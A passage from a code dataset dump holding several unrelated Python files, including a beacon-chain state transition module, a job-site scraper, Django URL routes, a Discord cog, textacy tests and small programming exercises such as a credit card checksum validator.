postgresql.cursor()\n cur.execute(\"SHOW max_connections\")\n assert cur.fetchone() == (\"100\",)\n\n\ndef test_db_creation(postgresql):\n \"\"\"Test if you can create a postgres db\"\"\"\n cur = postgresql.cursor()\n cur.execute(\"CREATE TABLE test (id serial PRIMARY KEY, num integer, data varchar);\")\n postgresql.commit()\n cur.close()\n\n\ndef test_orm():\n \"\"\"Tests creation and query of an item in ParsedText -- doing it live due to lack of time\"\"\"\n test_json = {\"text\": 101}\n instance = ParsedText.ParsedText(\n url=\"https://google.com\",\n big_text=\"some lengthy test text\",\n text_analysis=test_json,\n )\n instance.save()\n saved_item = ParsedText.ParsedText.query.first()\n assert saved_item.url == \"https://google.com\"","sub_path":"server/test_server.py","file_name":"test_server.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"452313541","text":"from typing import (\n Any,\n Dict,\n List,\n Tuple,\n TYPE_CHECKING,\n)\n\nfrom ssz import (\n deepcopy,\n)\n\nfrom beacon_chain.beacon_typing.custom import ( # noqa: F401\n BlockVoteCache,\n Hash32,\n ShardId,\n)\n\nimport beacon_chain.utils.bls as bls\nfrom beacon_chain.utils.blake import (\n blake,\n)\nfrom beacon_chain.utils.bitfield import (\n get_bitfield_length,\n has_voted,\n)\n\nfrom .config import (\n DEFAULT_CONFIG,\n)\nfrom .active_state import (\n ActiveState,\n)\nfrom .crosslink_record import (\n CrosslinkRecord,\n)\nfrom .crystallized_state import (\n CrystallizedState,\n)\nfrom .helpers import (\n get_active_validator_indices,\n get_attestation_indices,\n get_new_recent_block_hashes,\n get_new_shuffling,\n get_signed_parent_hashes,\n)\n\nif TYPE_CHECKING:\n from .attesation_record import AttestationRecord # noqa: F401\n from .block import Block # noqa: F401\n\n\ndef validate_block(block: 'Block') -> bool:\n # ensure parent processed\n # attestation from proposer of block was included with the block in the network message\n # ensure pow_chain_ref processed\n # ensure local time is large enough to process this block's slot\n\n return True\n\n\ndef validate_attestation(crystallized_state: CrystallizedState,\n active_state: ActiveState,\n attestation: 'AttestationRecord',\n block: 'Block',\n config: Dict[str, Any]=DEFAULT_CONFIG) -> None:\n if not attestation.slot < block.slot_number:\n raise Exception(\"Attestation slot number too high\")\n\n if not (attestation.slot > block.slot_number - config['cycle_length']):\n raise Exception(\n \"Attestation slot number too low:\\n\"\n \"\\tFound: %s, Needed greater than: %s\" %\n (attestation.slot, block.slot_number - config['cycle_length'])\n )\n\n # TODO: Verify that the justified_slot and justified_block_hash given are in\n # the chain and are equal to or earlier than the last_justified_slot\n # in the crystallized state.\n\n parent_hashes = get_signed_parent_hashes(\n active_state,\n block,\n attestation,\n config\n )\n attestation_indices = get_attestation_indices(\n crystallized_state,\n attestation,\n config\n )\n\n #\n # validate bitfield\n #\n if not (len(attestation.attester_bitfield) == get_bitfield_length(len(attestation_indices))):\n raise Exception(\n \"Attestation has incorrect bitfield length. Found: %s, Expected: %s\" %\n (len(attestation.attester_bitfield), get_bitfield_length(len(attestation_indices)))\n )\n\n # check if end bits are zero\n last_bit = len(attestation_indices)\n if last_bit % 8 != 0:\n for i in range(8 - last_bit % 8):\n if has_voted(attestation.attester_bitfield, last_bit + i):\n raise Exception(\"Attestation has non-zero trailing bits\")\n\n #\n # validate aggregate_sig\n #\n pub_keys = [\n crystallized_state.validators[index].pubkey\n for i, index in enumerate(attestation_indices)\n if has_voted(attestation.attester_bitfield, i)\n ]\n message = blake(\n attestation.slot.to_bytes(8, byteorder='big') +\n b''.join(parent_hashes) +\n attestation.shard_id.to_bytes(2, byteorder='big') +\n attestation.shard_block_hash +\n attestation.justified_slot.to_bytes(8, 'big')\n )\n if not bls.verify(message, bls.aggregate_pubs(pub_keys), attestation.aggregate_sig):\n raise Exception(\"Attestation aggregate signature fails\")\n\n\ndef get_updated_block_vote_cache(crystallized_state: CrystallizedState,\n active_state: ActiveState,\n attestation: 'AttestationRecord',\n block: 'Block',\n block_vote_cache: BlockVoteCache,\n config: Dict[str, Any]=DEFAULT_CONFIG) -> BlockVoteCache:\n new_block_vote_cache = deepcopy(block_vote_cache)\n\n parent_hashes = get_signed_parent_hashes(\n active_state,\n block,\n attestation,\n config\n )\n attestation_indices = get_attestation_indices(\n crystallized_state,\n attestation,\n config\n )\n\n for parent_hash in parent_hashes:\n if parent_hash in attestation.oblique_parent_hashes:\n continue\n if parent_hash not in new_block_vote_cache:\n new_block_vote_cache[parent_hash] = {\n 'voter_indices': set(),\n 'total_voter_deposits': 0\n }\n for i, index in enumerate(attestation_indices):\n if (has_voted(attestation.attester_bitfield, i) and\n index not in new_block_vote_cache[parent_hash]['voter_indices']):\n new_block_vote_cache[parent_hash]['voter_indices'].add(index)\n new_block_vote_cache[parent_hash]['total_voter_deposits'] += (\n crystallized_state.validators[index].balance\n )\n\n return new_block_vote_cache\n\n\ndef process_block(crystallized_state: CrystallizedState,\n active_state: ActiveState,\n block: 'Block',\n config: dict = DEFAULT_CONFIG) -> ActiveState:\n new_block_vote_cache = deepcopy(active_state.block_vote_cache)\n for attestation in block.attestations:\n validate_attestation(crystallized_state,\n active_state,\n attestation,\n block,\n config)\n new_block_vote_cache = get_updated_block_vote_cache(\n crystallized_state,\n active_state,\n attestation,\n block,\n new_block_vote_cache,\n config\n )\n\n new_attestations = active_state.pending_attestations + block.attestations\n\n new_active_state = ActiveState(\n pending_attestations=new_attestations,\n recent_block_hashes=active_state.recent_block_hashes[:],\n block_vote_cache=new_block_vote_cache\n )\n return new_active_state\n\n\ndef process_updated_crosslinks(crystallized_state: CrystallizedState,\n active_state: ActiveState,\n block: 'Block',\n config: Dict[str, Any]=DEFAULT_CONFIG) -> List[CrosslinkRecord]:\n total_attestation_balance = {} # type: Dict[Tuple[ShardId, Hash32], int]\n\n crosslinks = deepcopy(crystallized_state.crosslink_records)\n\n for attestation in active_state.pending_attestations:\n shard_tuple = (attestation.shard_id, attestation.shard_block_hash)\n if shard_tuple not in total_attestation_balance:\n total_attestation_balance[shard_tuple] = 0\n\n attestation_indices = get_attestation_indices(\n crystallized_state,\n attestation,\n config\n )\n # find total committee size by balance\n total_committee_balance = sum([\n crystallized_state.validators[index].balance\n for index in attestation_indices\n ])\n # find votes cast in attestation by balance\n total_attestation_balance[shard_tuple] += sum([\n crystallized_state.validators[index].balance\n for in_cycle_slot_height, index in enumerate(attestation_indices)\n if has_voted(attestation.attester_bitfield, in_cycle_slot_height)\n ])\n\n # if 2/3 of committee voted on crosslink and do no yet have crosslink\n # for this shard, for this dynasty, add updated crosslink\n if (3 * total_attestation_balance[shard_tuple] >= 2 * total_committee_balance and\n crystallized_state.current_dynasty > crosslinks[attestation.shard_id].dynasty):\n crosslinks[attestation.shard_id] = CrosslinkRecord(\n dynasty=crystallized_state.current_dynasty,\n slot=crystallized_state.last_state_recalc + config['cycle_length'],\n hash=attestation.shard_block_hash\n )\n return crosslinks\n\n\ndef initialize_new_cycle(crystallized_state: CrystallizedState,\n active_state: ActiveState,\n block: 'Block',\n config: Dict[str, Any]=DEFAULT_CONFIG\n ) -> Tuple[CrystallizedState, ActiveState]:\n cycle_length = config['cycle_length']\n last_state_recalc = crystallized_state.last_state_recalc\n last_justified_slot = crystallized_state.last_justified_slot\n last_finalized_slot = crystallized_state.last_finalized_slot\n justified_streak = crystallized_state.justified_streak\n # walk through slots last_state_recalc - CYCLE_LENGTH ... last_state_recalc - 1\n # and check for justification, streaks, and finality\n for i in range(cycle_length):\n slot = i + (last_state_recalc - cycle_length)\n\n block_hash = active_state.recent_block_hashes[i]\n if block_hash in active_state.block_vote_cache:\n vote_balance = active_state.block_vote_cache[block_hash]['total_voter_deposits']\n else:\n vote_balance = 0\n\n if 3 * vote_balance >= 2 * crystallized_state.total_deposits:\n last_justified_slot = max(last_justified_slot, slot)\n justified_streak += 1\n else:\n justified_streak = 0\n\n if justified_streak >= cycle_length + 1:\n last_finalized_slot = max(last_finalized_slot, slot - cycle_length - 1)\n\n crosslink_records = process_updated_crosslinks(\n crystallized_state,\n active_state,\n block,\n config\n )\n\n # remove attestations older than last_state_recalc\n pending_attestations = [\n a for a in active_state.pending_attestations\n if a.slot >= last_state_recalc\n ]\n\n dynasty = crystallized_state.current_dynasty # STUB\n dynasty_seed = crystallized_state.dynasty_seed # STUB\n dynasty_start = crystallized_state.dynasty_start\n validators = deepcopy(crystallized_state.validators) # STUB\n shard_and_committee_for_slots = (\n crystallized_state.shard_and_committee_for_slots[cycle_length:] +\n # this is a stub and will be addressed by shuffling at dynasty change\n crystallized_state.shard_and_committee_for_slots[cycle_length:]\n )\n active_validator_indices = get_active_validator_indices(dynasty, validators)\n\n new_crystallized_state = CrystallizedState(\n validators=validators,\n last_state_recalc=last_state_recalc + cycle_length,\n shard_and_committee_for_slots=shard_and_committee_for_slots,\n last_justified_slot=last_justified_slot,\n justified_streak=justified_streak,\n last_finalized_slot=last_finalized_slot,\n current_dynasty=crystallized_state.current_dynasty,\n crosslink_records=crosslink_records,\n total_deposits=sum(map(lambda i: validators[i].balance, active_validator_indices)),\n dynasty_seed=dynasty_seed,\n dynasty_start=dynasty_start\n )\n\n new_active_state = ActiveState(\n pending_attestations=pending_attestations,\n recent_block_hashes=active_state.recent_block_hashes[:],\n # Should probably clean up block_vote_cache but old records won't break cache\n # so okay for now\n block_vote_cache=deepcopy(active_state.block_vote_cache)\n )\n\n return new_crystallized_state, new_active_state\n\n\ndef fill_recent_block_hashes(active_state: ActiveState,\n parent_block: 'Block',\n block: 'Block') -> ActiveState:\n return ActiveState(\n pending_attestations=deepcopy(active_state.pending_attestations),\n recent_block_hashes=get_new_recent_block_hashes(\n active_state.recent_block_hashes,\n parent_block.slot_number,\n block.slot_number,\n block.parent_hash\n ),\n block_vote_cache=deepcopy(active_state.block_vote_cache)\n )\n\n\ndef compute_cycle_transitions(\n crystallized_state: CrystallizedState,\n active_state: ActiveState,\n block: 'Block',\n config: Dict[str, Any]=DEFAULT_CONFIG) -> Tuple[CrystallizedState, ActiveState]:\n while block.slot_number >= crystallized_state.last_state_recalc + config['cycle_length']:\n crystallized_state, active_state = initialize_new_cycle(\n crystallized_state,\n active_state,\n block,\n config=config,\n )\n if ready_for_dynasty_transition(crystallized_state, block, config):\n crystallized_state = compute_dynasty_transition(\n crystallized_state,\n block,\n config\n )\n\n return crystallized_state, active_state\n\n\ndef ready_for_dynasty_transition(crystallized_state: CrystallizedState,\n block: 'Block',\n config: Dict[str, Any]=DEFAULT_CONFIG) -> bool:\n slots_since_last_dynasty_change = block.slot_number - crystallized_state.dynasty_start\n if slots_since_last_dynasty_change < config['min_dynasty_length']:\n return False\n\n if crystallized_state.last_finalized_slot <= crystallized_state.dynasty_start:\n return False\n\n # gather every shard in shard_and_committee_for_slots\n required_shards = set()\n for shard_and_committee_for_slot in crystallized_state.shard_and_committee_for_slots:\n for shard_and_committee in shard_and_committee_for_slot:\n required_shards.add(shard_and_committee.shard_id)\n\n # check that crosslinks were updated for all required shards\n for shard_id, crosslink in enumerate(crystallized_state.crosslink_records):\n if shard_id in required_shards:\n if crosslink.slot <= crystallized_state.dynasty_start:\n return False\n\n return True\n\n\ndef compute_dynasty_transition(crystallized_state: CrystallizedState,\n block: 'Block',\n config: Dict[str, Any]=DEFAULT_CONFIG) -> CrystallizedState:\n crystallized_state = deepcopy(crystallized_state)\n crystallized_state.current_dynasty += 1\n\n # Not current in spec, but should be added soon\n crystallized_state.dynasty_start = crystallized_state.last_state_recalc\n\n next_start_shard = (\n (crystallized_state.shard_and_committee_for_slots[-1][-1].shard_id + 1) %\n config['shard_count']\n )\n\n crystallized_state.shard_and_committee_for_slots[config['cycle_length']:] = get_new_shuffling(\n block.parent_hash, # stub until better RNG\n crystallized_state.validators,\n crystallized_state.current_dynasty,\n next_start_shard\n )\n\n return crystallized_state\n\n\ndef compute_state_transition(\n parent_state: Tuple[CrystallizedState, ActiveState],\n parent_block: 'Block',\n block: 'Block',\n config: Dict[str, Any]=DEFAULT_CONFIG) -> Tuple[CrystallizedState, ActiveState]:\n crystallized_state, active_state = parent_state\n\n assert validate_block(block)\n\n # Update active state to fill any missing hashes with parent block hash\n active_state = fill_recent_block_hashes(active_state, parent_block, block)\n\n # process per block state changes\n active_state = process_block(\n crystallized_state,\n active_state,\n block,\n config\n )\n\n # Initialize a new cycle(s) if needed\n crystallized_state, active_state = compute_cycle_transitions(\n crystallized_state,\n active_state,\n block,\n config=config,\n )\n\n return crystallized_state, active_state\n","sub_path":"beacon_chain/state/state_transition.py","file_name":"state_transition.py","file_ext":"py","file_size_in_byte":15658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"336526539","text":"# -*- coding: UTF-8 -*-\nfrom threading import Thread\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nfrom util.logger import Logger\nfrom util.constants import Constants\nfrom util.proxyip import ProxyIpUtil\nfrom model.job import Job\nfrom util.strfromat import StrUtil\nfrom dao.job import JobDao\nclass PageThread(Thread):\n #定义类变量\n random_proxies = ProxyIpUtil.get_random_proxies()\n\n def __init__(self, thread_id, page_url_queue, detail_url_queue):\n Thread.__init__(self)\n self.logger = Logger('PageThread', thread_name='PageThread%d' % thread_id)\n self.thread_id = thread_id\n self.page_url_queue = page_url_queue\n self.detail_url_queue = detail_url_queue\n\n def run(self):\n while True:\n page_url = self.page_url_queue.get()\n try:\n response = requests.get(page_url, headers=Constants.headers, proxies=PageThread.random_proxies)\n if response.status_code == 200:\n soup = BeautifulSoup(response.text, 'lxml')\n for a_tag in soup.find_all(href=re.compile(\"^/j/[0-9]*?$\")):\n href = a_tag['href']\n detail_url = Constants.detail_url % href[3:]\n self.logger.info(detail_url)\n self.detail_url_queue.put(detail_url)\n except Exception as e:\n self.logger.error(e)\n # 标志着已经做完\n self.page_url_queue.task_done()\n\n\nclass DetailThread(Thread):\n\n # 定义类变量\n random_proxies = ProxyIpUtil.get_random_proxies()\n job_dao = JobDao()\n def __init__(self,thread_id, detail_url_queue):\n Thread.__init__(self)\n self.logger = Logger('DetailThread', thread_name='DetailThread%d' % thread_id)\n self.thread_id = thread_id\n self.detail_url_queue = detail_url_queue\n\n def run(self):\n while True:\n detail_url = self.detail_url_queue.get()\n try:\n response = requests.get(detail_url, headers=Constants.headers, proxies=DetailThread.random_proxies)\n if response.status_code == 200:\n soup = BeautifulSoup(response.text, 'lxml')\n job = Job()\n # 电子商务\n # A轮\n # 1000以上\n job_detail = soup.find(id=\"jobDetail\")\n grey_spans = job_detail.find_all(\"span\", class_=\"grey\")\n job.domain = grey_spans[1].text\n job.company_type = grey_spans[2].text\n employee_num = grey_spans[3].text\n # 将公司人数最多和最少提取出来\n match_obj = re.match(r'([0-9]*)-([0-9]*).*', employee_num)\n if match_obj:\n job.min_empolyee_num = int(match_obj.group(1))\n job.max_empolyee_num = int(match_obj.group(2))\n else:\n match_obj = re.match(r'([0-9]*).*', employee_num)\n job.min_empolyee_num = int(match_obj.group(1))\n job.max_empolyee_num = 0\n job.office_url = job_detail.find_all(\"a\", class_=\"grey\")[0].text\n #
\n jobdetailhead = job_detail.find_all(\"div\", class_=\"jobdetailhead\")[0]\n #
UC事业部-视频技术处理专家
\n job.name = soup.find_all(\"div\", class_=\"font26\")[0].text\n # 阿里巴巴\n job.company_name = job_detail.find_all(\"a\", class_='font18')[0].text\n # 0k-0k\n # 5-10年\n # \n # 北京\n # UC事业部\n mr10_spans = jobdetailhead.find_all(\"span\", class_=\"mr10\")\n salary = mr10_spans[0].text\n # 将薪资最高和最低提取出来\n match_obj = re.match(r'([0-9]*)k-([0-9]*)k', salary)\n if match_obj:\n job.min_salary = int(match_obj.group(1))\n job.max_salary = int(match_obj.group(2))\n job.experience = mr10_spans[1].text\n job.education = mr10_spans[2].text\n job.city = mr10_spans[3].text\n job.department = mr10_spans[4].text\n address_div = job_detail.find_all(\"div\", class_=\"mt20\")[1]\n job.address = address_div.find_next(\"div\").text\n job.address = StrUtil.replace_useless_str(job.address)\n #
\n job.competence = job_detail.find_all(\"div\", class_=\"jobdetailcon\")[0].text\n job.competence = StrUtil.replace_useless_str(job.competence)\n self.logger.info(job.to_string())\n DetailThread.job_dao.insert_one(job)\n except Exception as e:\n self.logger.error(e)\n self.detail_url_queue.task_done()\n","sub_path":"spider/mythread.py","file_name":"mythread.py","file_ext":"py","file_size_in_byte":5586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"482849308","text":"from __future__ import absolute_import, unicode_literals\n\nimport os\n\nimport pytest\n\nfrom textacy import compat\nfrom textacy.datasets.oxford_text_archive import OxfordTextArchive\n\nDATASET = OxfordTextArchive()\n\npytestmark = pytest.mark.skipif(\n DATASET.filename is None,\n reason=\"OxfordTextArchive dataset must be downloaded before running tests\",\n)\n\n\n@pytest.mark.skip(\"No need to download a new dataset every time\")\ndef test_download(tmpdir):\n dataset = OxfordTextArchive(data_dir=str(tempdir))\n dataset.download()\n assert os.path.exists(dataset.filename)\n\n\ndef test_ioerror(tmpdir):\n dataset = OxfordTextArchive(data_dir=str(tmpdir))\n with pytest.raises(IOError):\n _ = list(dataset.texts())\n\n\ndef test_texts():\n for text in DATASET.texts(limit=3):\n assert isinstance(text, compat.unicode_)\n\n\ndef test_texts_limit():\n for limit in (1, 5, 100):\n assert sum(1 for _ in DATASET.texts(limit=limit)) == limit\n\n\ndef test_texts_min_len():\n for min_len in (100, 200, 1000):\n assert all(\n len(text) >= min_len for text in DATASET.texts(min_len=min_len, limit=10)\n )\n\n\ndef test_records():\n for record in DATASET.records(limit=3):\n assert isinstance(record, dict)\n\n\ndef test_records_author():\n authors = ({\"Shakespeare, William\"}, {\"Wollstonecraft, Mary\", \"Twain, Mark\"})\n for author in authors:\n assert all(\n a in author\n for r in DATASET.records(author=author, limit=10)\n for a in r[\"author\"]\n )\n\n\ndef test_records_date_range():\n date_ranges = ([\"1900-01-01\", \"1950-01-01\"], (\"1600-01-01\", \"1700-01-01\"))\n for date_range in date_ranges:\n assert all(\n date_range[0] <= r[\"year\"] < date_range[1]\n for r in DATASET.records(date_range=date_range, limit=10)\n )\n\n\ndef test_bad_filters():\n bad_filters = ({\"author\": \"Burton DeWilde\"}, {\"date_range\": \"2016-01-01\"})\n for bad_filter in bad_filters:\n with pytest.raises(ValueError):\n list(DATASET.texts(**bad_filter))\n","sub_path":"tests/test_dataset_oxford_text_archive.py","file_name":"test_dataset_oxford_text_archive.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"450179282","text":"#!/usr/bin/python\n# AW.py - python2 using curses\n# ===================================================================\n# \n\nimport curses\nimport readline\nimport json, shelve\nfrom aw_save import loadAW, saveAW\nfrom aw_names import namePick \nfrom aw_character import character, player\nfrom aw_menu import fclear,run_menu as menu, display_box as show\nfrom aw_debug import logger\n\ndef newGame():\n try:\n with open('AW-db/aw_classes.json') as f:\n awcl=json.load(f)\n except IOError:\n print(IOError)\n p = player()\n p.starterPack(awcl)\n m=[]\n for i in p.characters:\n m.append(i.display())\n return p\n\ndef menuGame(m,w):\n fclear(w)\n r=menu(m,2, 5)\n return r\n\ndef selectCharacter(p):\n m=[]\n for i,c in enumerate(p.characters):\n m.append(str(i)+' '+c.name+' '+c.classe)\n r=menu(m, 4, 12)\n show(['selected',m[r]])\n return r\n\ndef startGame(p,w,s):\n m=['Town','Gear','Mission','Exit']\n r=menu(m,24, 5 )\n n=p.characters[s].name\n while (r!=len(m)-1):\n if r==0:\n show([n,'Going to Town'], False)\n elif r==1:\n show([n,'listing Gear'], False)\n elif r==2:\n show([n,'Going in Mission'], False)\n r=menu(m,24,5)\n return\n\ndef main(self):\n win=curses.initscr()\n try:\n db=shelve.open('saves/aw_saves')\n except IOError:\n print(IOError)\n exit()\n # p = player()\n p = db['AW']\n m=['New Game','Load Game','Select character','Save Team','Quit']\n r=menuGame(m,win)\n while r!=len(m)-1:\n if r==0:\n p=newGame()\n show(['New Game'])\n elif r==1:\n p=loadAW()\n show(['Game loaded'])\n elif r==2:\n s=selectCharacter(p)\n startGame(p,win,s)\n elif r==3:\n saveAW(p)\n show(['Game Saved'])\n r=menuGame(m,win)\n curses.endwin()\n return\n\nif __name__ == \"__main__\":\n curses.wrapper(main)\n","sub_path":"AW.py","file_name":"AW.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"262986317","text":"\"\"\"lastwill URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom allauth.account.views import confirm_email as allauthemailconfirmation\nfrom rest_framework.routers import DefaultRouter\n\nfrom lastwill.main.views import index, balance, login, eth2rub\nfrom lastwill.profile.views import UserConfirmEmailView, profile_view, create_ghost\nfrom lastwill.contracts.api import ContractViewSet, get_cost, get_code, test_comp, get_contract_types, pizza_delivered\nfrom lastwill.other.api import SentenceViewSet\n\nrouter = DefaultRouter(trailing_slash=True)\nrouter.register(r'contracts', ContractViewSet)\nrouter.register(r'sentences', SentenceViewSet)\n\nurlpatterns = [\n url(r'^reset', index),\n url(r'^', include('django.contrib.auth.urls')),\n url(r'^admin/', admin.site.urls),\n url(r'^api/', include(router.urls)),\n url(\n r'^api/rest-auth/registration/account-confirm-email/(?P[-:\\w]+)/$',\n allauthemailconfirmation, name=\"account_confirm_email\"\n ),\n url(r'^api/rest-auth/', include('rest_auth.urls')),\n url(r'^api/rest-auth/registration/', include('rest_auth.registration.urls')),\n url(r'^/email-verification-sent/$', index, name='account_email_verification_sent'),\n url(r'^api/profile/', profile_view),\n url(r'^api/get_cost/', get_cost),\n url(r'^api/balance/', balance),\n url(r'^auth/', login),\n url(r'^api/get_code/', get_code),\n url(r'^api/test_comp/', test_comp),\n url(r'^api/create_ghost/', create_ghost),\n url(r'^api/get_contract_types', get_contract_types),\n url(r'^api/eth2rub/', eth2rub),\n url(r'^api/pizza_delivered/', pizza_delivered),\n]\n\nurlpatterns += url(r'^/*', index, name='all'),\n\n","sub_path":"lastwill/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"135101827","text":"#!/usr/bin/env python\n\nfrom argparse import ArgumentParser\n\nfrom json import load as json_load\nfrom jsonschema import validate as jsonschema_validate\nfrom yaml import safe_load as yaml_safe_load\n\n\ndef _parse_args():\n parser = ArgumentParser()\n parser.add_argument(\"spec_path\", type=str, help=\"JSON schema specification path\")\n parser.add_argument(\"sample_path\", type=str, help=\"JSON document sample path\")\n return parser.parse_args()\n\n\ndef main(args):\n with open(args.sample_path) as sample_data, open(args.spec_path) as spec_data:\n sample_dict = json_load(sample_data)\n spec_dict = yaml_safe_load(spec_data)\n\n schema_dict = {**spec_dict, \"$ref\": \"#/$defs/SystemProfile\"}\n jsonschema_validate(instance=sample_dict, schema=schema_dict)\n\n\nif __name__ == \"__main__\":\n parsed_args = _parse_args()\n main(parsed_args)\n","sub_path":"tools/simple-test/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"480900161","text":"import random\nimport config\nimport discord\nfrom discord.ext import commands\n\n\nclass Meme:\n \"\"\"\n Meme commands.\n \"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n def check_if_staff_or_ot(ctx):\n is_ot = (ctx.channel.name == \"off-topic\")\n is_staff = any(r.id in config.staff_role_ids for r in ctx.author.roles)\n return (is_ot or is_staff)\n\n @commands.check(check_if_staff_or_ot)\n @commands.command(hidden=True, name=\"bam\")\n async def bam_member(self, ctx, user: discord.Member):\n \"\"\"Bams a user owo\"\"\"\n await ctx.send(f\"{self.bot.escape_name(user)} is ̶n͢ow b̕&̡.̷ 👍̡\")\n\n @commands.check(check_if_staff_or_ot)\n @commands.command(hidden=True, name=\"warm\")\n async def warm_member(self, ctx, user: discord.Member):\n \"\"\"Warms a user :3\"\"\"\n await ctx.send(f\"{user.mention} warmed.\"\n f\" User is now {random.randint(0, 100)}°C.\")\n\n @commands.command(hidden=True)\n async def frolics(self, ctx):\n \"\"\"test\"\"\"\n await ctx.send(\"https://www.youtube.com/watch?v=VmarNEsjpDI\")\n\n\ndef setup(bot):\n bot.add_cog(Meme(bot))\n","sub_path":"cogs/meme.py","file_name":"meme.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"376822027","text":"from mongoengine import *\nfrom mongoengine import connect\nconnect('webofscience', host='127.0.0.1', port=27017)\n\n\nclass ArtiInFo(Document):\n title = StringField('论文题目')\n address = StringField('作者地址')\n author = StringField('作者名单')\n dol = StringField('分区索引')\n dol_catalog = StringField('分区索引目录')\n leaf = StringField('页')\n periodical = StringField('发表期刊')\n stage = StringField('卷')\n volume = StringField('期')\n year = StringField('发表日期')\n checkout = BooleanField(default=True)\n\n meta = {\n 'collection': 'articles'\n }","sub_path":"django_auth_example/web/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"582717755","text":"#-*- coding: utf-8 -*-\n#one of the guy said , this question was asked during the interview.\n#https://www.geeksforgeeks.org/google-interview-experience-set-7-software-engineering-intern/\n\nfrom sys import stdin, stdout\n\ndef sol2(x):\n import re\n return re.sub(\"\\s+\", \" \", x)\n\ndef sol(x):\n pre = \"\"\n ans = \"\"\n for i, c in enumerate(x):\n if pre == \" \" and c == \" \":\n continue\n else:\n #print(i, c, end=\"\")\n ans += c\n pre = c\n return ans\n\ndef test():\n x = \"I love on earth\"\n expected = \"I love on earth\"\n ret = sol(x)\n stdout.write(\"%s\\n\" % str(ret))\n\ndef main():\n n_ts = int(stdin.readline())\n for i in range(n_ts):\n n = int(stdin.readline())\n S = [int(x) for x in stdin.readline().split()]\n ret = sol(S)\n stdout.write(\"%s\\n\" % str(ret))\n\n# call the main method\nif __name__ == \"__main__\":\n #main()\n test()\n\n\n","sub_path":"problems/gfg_single_space_sentense.py","file_name":"gfg_single_space_sentense.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"628789572","text":"import cs50\n\ndef main():\n # prompt user for credit card no.\n print(\"Number: \", end=\"\")\n ccn = cs50.get_string()\n \n # check & report the card's validity\n print(check(ccn))\n\ndef check(ccn):\n # check which creditor the card belongs to then check for validity\n digits = len(ccn)\n if digits == 15 and (ccn[:2] == \"34\" or ccn[:2] == \"37\") and check_sum(ccn):\n return \"AMEX\"\n if (digits == 16 or digits == 13) and ccn[:1] == \"4\" and check_sum(ccn):\n return \"VISA\"\n if digits == 16 and (ccn[:2] == \"51\" or ccn[:2] == \"52\" or ccn[:2] == \"53\" or ccn[:2] == \"54\" or ccn[:2] == \"55\"):\n return \"Mastercard\"\n return \"INVALID\"\n\ndef check_sum(ccn):\n # starting from the second-last digit, multiply every other digit by 2\n multiply = ccn[-2::-2]\n products = []\n for i in range(len(multiply)):\n product = int(multiply[i]) * 2\n if (product > 9):\n for j in range(len(str(product))):\n products.append(int(str(product)[j]))\n else:\n products.append(product)\n \n # add the product's digits (not the products themselves)\n product_sum = 0\n for i in products:\n product_sum += i\n\n # add the previous sum to the digits that weren't multiplied by 2\n not_multiplied = ccn[::-2]\n for i in not_multiplied:\n product_sum += int(i)\n\n # if the last digit is 0 (sum % 10 == 0) the number is valid\n if (product_sum % 10 == 0):\n return True\n \n return False\n \n \nif __name__ == \"__main__\":\n main()","sub_path":"pset6/credit.py","file_name":"credit.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553393982","text":"from collections import deque\n\ndef solution(strs, t):\n answer = 20000\n \n word_dict = {}\n already_taken = {}\n for string in strs: \n if string[0] not in word_dict: \n word_dict[string[0]] = [string]\n else: \n word_dict[string[0]].append(string)\n word_end = len(t)\n queue = deque([(0, 0)])\n \n while queue:\n curr = queue.popleft()\n curr_word_start = curr[0]\n curr_cnt = curr[1]\n \n if curr_word_start >= word_end:\n answer = min(answer, curr_cnt)\n break\n \n if t[curr_word_start] in word_dict: \n word_length = word_end - curr_word_start\n frag_list = word_dict[t[curr_word_start]] \n \n for frag in frag_list: \n frag_length = len(frag) \n if frag_length <= word_length: \n next_start = curr_word_start + frag_length\n if frag == t[curr_word_start : next_start]:\n if next_start not in already_taken:\n queue.append((next_start, curr_cnt + 1))\n already_taken[next_start] = True\n \n if answer == 20000:\n return -1 \n return answer","sub_path":"11week/sehwan/kakao7.py","file_name":"kakao7.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"368594538","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport uuid\nimport json\nimport sys\nimport os\nimport re\nimport requests\nimport argparse\nimport time\n\nOPER = {\n 